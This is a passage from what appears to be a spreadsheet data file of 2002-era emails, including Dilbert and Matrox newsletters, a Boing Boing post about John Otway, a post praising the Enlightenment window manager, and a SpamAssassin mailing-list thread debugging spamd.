 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BACKGROUND=3D"http://www.comi=
 cs.com/comics/dilbert/daily_dilbert/images/white_line_right.gif" ROWSPAN=3D=
 "6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"349" ROWSPAN=3D"7"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGH=
 T=3D"349" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"200" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/books.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Books"&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://umm=
 ail4.unitedmedia.com:80/Click?q=3D05-gDWLIG8ZRwWz-Ndfn5DFHO-sYsRR"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/ads/book_badge.gif" WIDTH=3D"169" =
 HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Another Day in Cubicle Paradise"&gt;&lt;/A&gt;&lt;BR&gt;=
 &lt;BR&gt;Complete your collection while pretending to work!&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D1b=
 -wAdhI3NAI6xete2Q1X5Z4ZDSRRRR"&gt;&gt; Shop&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"83" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click=
 ?q=3D30-u8jEIRrZEt7Uz7Y8IlOUGDJ7NdRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/com=
 ics/dilbert/daily_dilbert/images/thumb_dilbert_mints.gif" WIDTH=3D"83" HEIG=
 HT=3D"57" BORDER=3D"0" ALT=3D"Dilbert Mints"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/mints.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Graphic (live connection required)"&gt;&lt;BR&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"120=
 " HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;They're character-shaped, in colle=
 ctible tins.&lt;BR&gt;&lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedm=
 edia.com:80/Click?q=3D45-fNgJIKBR802yZaL-EGvB0UNgJdRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 /TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"162" HEIGHT=3D"24" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/clothing_and_posters.gif" WIDTH=
 =3D"121" HEIGHT=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;Get any Dilbert strip publ=
 ished in the last 90 days printed on a&lt;BR&gt;T-shirt, sweatshirt or poster. Se=
 lected older strips are also available.&lt;BR&gt;
 &lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Clic=
 k?q=3D5a-ahO1IP0JMbyqJGQ24JOKBJC4zsRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDT=
 H=3D"148" HEIGHT=3D"20" BORDER=3D"0" ALT=3D""&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09&lt;TD WIDTH=3D"14" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"=
 http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gif" WIDTH=
 =3D"14" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"148" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D6f-3xY9IOL2bHzQPFa3RUvKTN9nPsRR"&gt;View all pro=
 ducts&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"5" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"585" HEIGHT=3D"5" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;!-- COMIC STRIP HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT face=3D"helvet=
 ica, arial" size=3D1&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily=
 _dilbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0=
 "&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D=
 84-CCDyQ60lyzxJ3vMZsnhhpYUoZsRR"&gt;Modify Your Account&lt;/A&gt;/&lt;A target=3D"_blan=
 k" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D99-4mayQAdljIiC5302H=
 HfS87c8B9RR"&gt;Unsubscribe&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=3D"RIGHT" BGCOLOR=3D"#FFF=
 FFF" COLSPAN=3D"7"&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A target=3D"=
 _blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dae-jOB6QMB3Lkrt=
 26N8-1hV197zDRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_di=
 lbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;B=
 uy This Strip&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A HREF=3D"http://www.comics.com/webmail=
 /SendAStrip?AppName=3DSendAStrip&amp;ComicName=3D/comics/dilbert/&amp;Attachments=
 =3D/comics/dilbert/archive/images/dilbert2002261210718.gif&amp;EmailDate=3DJuly=
 -18-2002"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/im=
 ages/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Send This=
  Strip to a Friend&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A target=3D"_blank" HREF=3D"http:/=
 /ummail4.unitedmedia.com:80/Click?q=3Dc3-x1sCQJLo-_hzEofZ57n0NcndxRRR"&gt;&lt;IMG=
  SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gi=
 f" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Month of Dilbert&lt;/A&gt;&amp;nb=
 sp;&amp;nbsp;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"10"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dd8-XWY3=
 QWLZI72kzzimkkW6f-kQVsRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/=
 archive/images/dilbert2002261210718.gif" BORDER=3D"0" ALT=3D"You need to go=
  online to see today's strip and other cool features on the Daily Dilbert."=
 &gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.=
 gif" WIDTH=3D"600" HEIGHT=3D"8" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- FOOTER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"610" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" HEIGHT=3D"1" BGCOLOR=3D"#003366" COLSPAN=
 =3D"8"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"610" HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"4" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"478" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"478" HEIGHT=3D"4"=
  BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Ded-jLFv=
 QgVY7ShOZVrxvHo6d2BfGsRR"&gt;Unsubscribe&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"ht=
 tp://ummail4.unitedmedia.com:80/Click?q=3D03-13a3I3rKzAKImMuhKWclEr1LbRRR"&gt;=
 Modify Your Subscription&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"http://ummail4.=
 unitedmedia.com:80/Click?q=3D18-WhnzI98YBTLkwbpTiCEfC8jcRdRR"&gt;Request a New=
  Subscription&lt;/A&gt; | &lt;a href=3D"mailto:dilberthelp@unitedmedia.com"&gt;Report S=
 ubscription Problems&lt;/A&gt;&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D2d=
 -OxXyIbKm-eNwhZ-VdigfyvwxQdRR"&gt;Subscribe to the Dilbert Newsletter/Join Dog=
 bert's New Ruling Class&lt;/A&gt; |&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D42=
 -rFYcIPK5Kx7uQ3LpzHFNliBPMsRR"&gt;Dilbert on Your Site/Intranet&lt;/A&gt; | &lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D57-YJKXII0=
 tFxWObwAF0u_u9RX_z9RR"&gt;Advertising Info&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"=
 http://ummail4.unitedmedia.com:80/Click?q=3D6c-SUp3IuP-jfYFrwGKQMLAN3ZhW9RR=
 "&gt;Dilbert in Your Publication&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"45" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"45" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"62" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"62" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3D81-z1KaQ-KLr9gSx2vpq_Rxt9CJZ9RR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/comics_com_logo.gif" WID=
 TH=3D"62" HEIGHT=3D"42" BORDER=3D"0" ALT=3D"Comics.com"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" BACKGROUND=3D"http://www.comics.com/comics/d=
 ilbert/daily_dilbert/images/white_line_right.gif"&gt;&lt;IMG SRC=3D"http://www.co=
 mics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" HEIGHT=3D"4" BORD=
 ER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" COLSPAN=3D"8"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/daily_dilbert_footer.gif" WIDTH=
 =3D"610" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- FOOTER TABLE END --&gt;
 =09=09=09
 =09=09&lt;/TD&gt;
 =09=09&lt;TD&gt;
 =09=09
 =09=09=09
 =09=09
 =09=09=09&lt;!-- SKYSCRAPER TABLE BEGIN --&gt;
 =09=09=09&lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" height=3D"=
 600"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/=
 small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" BORDER=3D"0" ALT=3D"Advertisement"=
 &gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif"=
  WIDTH=3D"2" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=
 =3D1D74C2EA&amp;pcode=3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flow=
 go.com/images/bt/p2p.gif?ccode=3D1D74C2EA&amp;pcode=3DEF39755C" width=3D120 hei=
 ght=3D600 border=3D0&gt;&lt;/a&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/table&gt;
 =09=09=09&lt;!-- SKYSCRAPER TABLE END --&gt;
 =09=09=09
 =09=09=09
 =09=09=09
 =09=09&lt;/TD&gt;
 =09&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE END --&gt;
 &lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=3DAFEBB3C4&amp;pcode=
 =3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flowgo.com/images/bt/=
 p2p.gif?ccode=3DAFEBB3C4&amp;pcode=3DEF39755C" width=3D"120" height=3D"600" bor=
 der=3D"0"&gt;&lt;/a&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://ummail4.unitedmedia.com:80/Click?q=
 =3D96-pjZW-Mded9OUD1ciUQghG2RG"&gt;
 --16675500.1026989382816.JavaMail.root.umsan1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Indie artist hits top-ten by engaging audience
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534142
 Date: Not supplied
 Feorag writes from Scotland: "You probably haven't heard of John Otway, but he 
 has a small and devoted following here. He did a limited issue CD and asked his 
 fans to vote on which track _they'd_ like to see as a single. The one they 
 picked just entered the UK charts at number 9! Bet that'll piss off the major 
 record labels, especially as the marketing budget was probably about zero. I 
 might just watch Top of the Pops this week." Link[1] Discuss[2] (_Thanks, 
 Feorag[3]!_)
 [1] http://news.bbc.co.uk/1/hi/entertainment/music/2304155.stm
 [2] http://www.quicktopic.com/boing/H/qNF789XLAj4p7
 [3] http://www.antipope.org/feorag/e-prattle/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Enlightenment
</t>
  </si>
  <si>
    <t xml:space="preserve">I finally let go of my Irix Magic desktop and window manager
 and evaluated several other window managers. Having lost my 10 years
 of customization with my X10 and then X11 desktop at one point
 at UCI, I promised myself that I'd never get attached to
 another WM.  I limped along in the default Gnome desktop, I
 had a few unsuccessful stabs at the Solaris open view 
 desktop, but nothing really stuck.   Because of this along
 with SGI's love of pre-configured, pre-compiled freeware[1],
 I never really made the jump from Irix to Linux either.  
 After installing the enlightenment WM, I have to say, I am
 really enlightened.  It's definitely a far cry from the no frills
 first look from previous versions.  It's only on version 0.17,[2]
 but it's a careful balance between simplicity, performance,
 (fun) features, applications, and ease of customization.  The
 number of themes they have on freshmeat is amazing. [3] After
 less than an hour or two of "nesting" I already have almost
 all my menus and controls setup just the way I want. 
 I definitely recommend this to any Irix desktop holdouts.  It's
 a great way to refresh your machine SGI without having to bite the
 bullet and rebuild it as a Linux machine. 
 Greg
 [1] http://freeware.sgi.com/
 [2] http://www.enlightenment.org/
 [3] http://themes.freshmeat.net/browse/60/?topic_id=60
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Cannot get spamd to work
</t>
  </si>
  <si>
    <t xml:space="preserve">So sprach Malte S. Stretz am 2002-07-21 um 01:56:18 +0200 :
 &gt; Not really. In most cases it's an install-and-forget. But there're some 
 &gt; special cases like you. Be proud! You're special :o)
 Uhm, yes, I'm happy that it doesn't work for me ;))
 &gt; I had a look at the spamc source and put a printf everywhere an exit code 74 
 &gt; is used; could you have a try with the attached spamc, please?
 read_message-&gt;old_serverex 74
 host:~/.cpan/build/Mail-SpamAssassin-2.31 # telnet localhost 783
 Trying 127.0.0.1...
 Connected to localhost.
 Escape character is '^]'.
 df
 SPAMD/1.0 76 Bad header line: df
 Connection closed by foreign host.
 Just like John just said - thanks a lot for taking all that time to help
 me get SA to work!  I'm *REALLY* thankful for this!
 Alexander Skwar
 -- 
 How to quote:	http://learn.to/quote (german) http://quote.6x.to (english)
 Homepage:	http://www.iso-top.biz     |    Jabber: askwar@a-message.de
    iso-top.biz - Die gnstige Art an Linux Distributionen zu kommen
                        Uptime: 4 days 14 hours 37 minutes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</si>
  <si>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=?iso-8859-1?Q?Matrox_Parhelia=99_now_available?=
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --=====================_22773175==_.ALT
 Content-Type: text/plain; charset="us-ascii"; format=flowed
 Matrox Parhelia - available now!
 The Matrox Parhelia graphics board is now available for purchase. Visit the 
 Buy Matrox section of our Web site for a complete list of locations where 
 Matrox products are available:
 http://www.matrox.com/mga/start/newsletter/jul_2002/buymatrox.cfm
 Immerse yourself in a high-fidelity underwater world with the Matrox 
 Parhelia Reef Demo
 Developed in-house by Matrox, the Matrox Reef Demo showcases the quality, 
 realism and complex rendering power of the Parhelia-512 and includes more 
 than 50 realistic underwater denizens rendered simultaneously. While you 
 can't get the full effect of the demo without having your very own Matrox 
 graphics board based on the Parhelia-512 GPU, we have put together a few 
 pre-rendered avi versions for you to download. Click here for more:
 http://www.matrox.com/mga/start/newsletter/jul_2002/reefstory.cfm
 New Matrox Parhelia wallpapers
 Decorate your desktop with the Matrox Parhelia! Choose from images of the 
 Parhelia logo, the Immerse yourself in High Fidelity Graphics grid, and 
 numerous screenshots from the spectacular Parhelia Reef Demo! Download your 
 favorite shot now  click here:
 http://www.matrox.com/mga/start/newsletter/jul_2002/wallpapers.cfm
 New Matrox Parhelia screensaver
 We also have a new Matrox Parhelia screensaver - download it here:
 http://www.matrox.com/mga/start/newsletter/jul_2002/screensaver.cfm
 Parhelia-512 previews and reviews
 The press is talking - check out the latest Matrox Parhelia previews and 
 reviews here:
 http://www.matrox.com/mga/start/newsletter/jul_2002/reviews.cfm
 Have a great day!
 Matrox Graphics Web Team
 ***************************************************************************
 Please send your comments about this newsletter to: 
 &lt;mailto:newsletter@matrox.com&gt;newsletter@matrox.&lt;mailto:newsletter@matrox.com&gt;com
 To unsubscribe, please visit:
 http://www.matrox.com/mga/start/newsletter/jul_2002/unsubscribe.cfm
 To change your e-mail address or make changes to your profile, please visit:
 http://www.matrox.com/mga/start/newsletter/jul_2002/registration.cfm
 ***************************************************************************
 --=====================_22773175==_.ALT
 Content-Type: text/html; charset="us-ascii"
 &lt;html&gt;
 &lt;br&gt;
 &lt;font size=2&gt;&lt;b&gt;Matrox Parhelia - available now!&lt;br&gt;
 &lt;/b&gt;The Matrox Parhelia graphics board is now available for purchase.
 Visit the Buy Matrox section of our Web site for a complete list of
 locations where Matrox products are available:&lt;br&gt;
 &lt;/font&gt;&lt;font size=2 color="#0000FF"&gt;&lt;u&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/buymatrox.cfm" eudora="autourl"&gt;http://www.matrox.com/mga/start/newsletter/jul_2002/buymatrox.&lt;/a&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/buymatrox.cfm" eudora="autourl"&gt;cfm&lt;br&gt;
 &lt;br&gt;
 &lt;/a&gt;&lt;/u&gt;&lt;/font&gt;&lt;font size=2&gt;&lt;b&gt;Immerse yourself in a high-fidelity
 underwater world with the Matrox Parhelia Reef Demo&lt;br&gt;
 &lt;/b&gt;Developed in-house by Matrox, the Matrox Reef Demo showcases the
 quality, realism and complex rendering power of the Parhelia-512 and
 includes more than 50 realistic underwater denizens rendered
 simultaneously. While you can't get the full effect of the demo without
 having your very own Matrox graphics board based on the Parhelia-512 GPU,
 we have put together a few pre-rendered avi versions for you to download.
 Click here for more:&lt;br&gt;
 &lt;/font&gt;&lt;font size=2 color="#0000FF"&gt;&lt;u&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/reefstory.cfm" eudora="autourl"&gt;http://www.matrox.com/mga/start/newsletter/jul_2002/reefstory.&lt;/a&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/reefstory.cfm" eudora="autourl"&gt;cfm&lt;br&gt;
 &lt;br&gt;
 &lt;/a&gt;&lt;/u&gt;&lt;/font&gt;&lt;font size=2&gt;&lt;b&gt;New Matrox Parhelia wallpapers&lt;br&gt;
 &lt;/b&gt;Decorate your desktop with the Matrox Parhelia! Choose from images of
 the Parhelia logo, the Immerse yourself in High Fidelity Graphics grid,
 and numerous screenshots from the spectacular Parhelia Reef Demo!
 Download your favorite shot now&amp;nbsp; click here:&lt;br&gt;
 &lt;/font&gt;&lt;font size=2 color="#0000FF"&gt;&lt;u&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/wallpapers.cfm" eudora="autourl"&gt;http://www.matrox.com/mga/start/newsletter/jul_2002/wallpapers.&lt;/a&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/wallpapers.cfm" eudora="autourl"&gt;cfm&lt;br&gt;
 &lt;br&gt;
 &lt;/a&gt;&lt;/u&gt;&lt;/font&gt;&lt;font size=2&gt;&lt;b&gt;New Matrox Parhelia screensaver&lt;br&gt;
 &lt;/b&gt;We also have a new Matrox Parhelia screensaver - download it
 here:&lt;br&gt;
 &lt;/font&gt;&lt;font size=2 color="#0000FF"&gt;&lt;u&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/screensaver.cfm" eudora="autourl"&gt;http://www.matrox.com/mga/start/newsletter/jul_2002/screensaver.&lt;/a&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/screensaver.cfm" eudora="autourl"&gt;cfm&lt;br&gt;
 &lt;br&gt;
 &lt;/a&gt;&lt;/u&gt;&lt;/font&gt;&lt;font size=2&gt;&lt;b&gt;Parhelia-512 previews and reviews&lt;br&gt;
 &lt;/b&gt;The press is talking - check out the latest Matrox Parhelia previews
 and reviews here:&lt;br&gt;
 &lt;/font&gt;&lt;font size=2 color="#0000FF"&gt;&lt;u&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/reviews.cfm" eudora="autourl"&gt;http://www.matrox.com/mga/start/newsletter/jul_2002/reviews.&lt;/a&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/reviews.cfm" eudora="autourl"&gt;cfm&lt;br&gt;
 &lt;br&gt;
 &lt;/a&gt;&lt;/u&gt;&lt;/font&gt;&lt;font size=2&gt;Have a great day!&lt;br&gt;
 &lt;br&gt;
 Matrox Graphics Web Team&lt;br&gt;
 &lt;br&gt;
 ***************************************************************************&lt;br&gt;
 Please send your comments about this newsletter to:
 &lt;/font&gt;&lt;a href="mailto:newsletter@matrox.com"&gt;&lt;font size=2 color="#0000FF"&gt;&lt;u&gt;newsletter@&lt;/a&gt;matrox.&lt;a href="mailto:newsletter@matrox.com"&gt;com&lt;br&gt;
 &lt;/a&gt;&lt;/u&gt;&lt;/font&gt;&lt;font size=2&gt;To unsubscribe, please visit:&lt;br&gt;
 &lt;/font&gt;&lt;font size=2 color="#0000FF"&gt;&lt;u&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/unsubscribe.cfm" eudora="autourl"&gt;http://www.matrox.com/mga/start/newsletter/jul_2002/unsubscribe.&lt;/a&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/unsubscribe.cfm" eudora="autourl"&gt;cfm&lt;br&gt;
 &lt;/a&gt;&lt;/u&gt;&lt;/font&gt;&lt;font size=2&gt;To change your e-mail address or make changes
 to your profile, please visit:&lt;br&gt;
 &lt;/font&gt;&lt;font size=2 color="#0000FF"&gt;&lt;u&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/registration.cfm" eudora="autourl"&gt;http://www.matrox.com/mga/start/newsletter/jul_2002/registration.&lt;/a&gt;&lt;a href="http://www.matrox.com/mga/start/newsletter/jul_2002/registration.cfm" eudora="autourl"&gt;cfm&lt;br&gt;
 &lt;br&gt;
 &lt;/a&gt;&lt;/u&gt;&lt;/font&gt;&lt;font size=2&gt;***************************************************************************&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;/html&gt;
 --=====================_22773175==_.ALT--
</t>
  </si>
  <si>
